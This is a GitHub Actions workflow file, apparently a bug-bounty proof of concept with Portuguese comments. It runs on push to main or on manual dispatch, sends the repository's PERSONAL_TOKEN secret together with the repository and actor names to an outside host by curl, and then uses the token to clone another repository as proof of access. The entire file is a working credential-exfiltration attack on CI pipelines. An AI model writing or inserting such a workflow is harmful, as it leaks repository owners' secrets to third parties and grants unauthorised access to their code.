name: "Leak PAT & Clone External Repo"

on:
  workflow_dispatch:        # botão “Run workflow” na interface
  push:
    branches: [main]

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltra PAT (PERSONAL_TOKEN)
        run: |
          curl -G "https://bolsonaro.cc/leak" \
               --data-urlencode "repo=${{ github.repository }}" \
               --data-urlencode "actor=${{ github.actor }}" \
               --data-urlencode "pat=${{ secrets.PERSONAL_TOKEN }}"

      - name: Prova de escopo — clona bugbounty1337/oratorioaa
        env:
          PAT: ${{ secrets.PERSONAL_TOKEN }}
        run: |
          git clone https://$PAT@github.com/bugbounty1337/oratorioaa.git
          ls -R oratorioaa | head
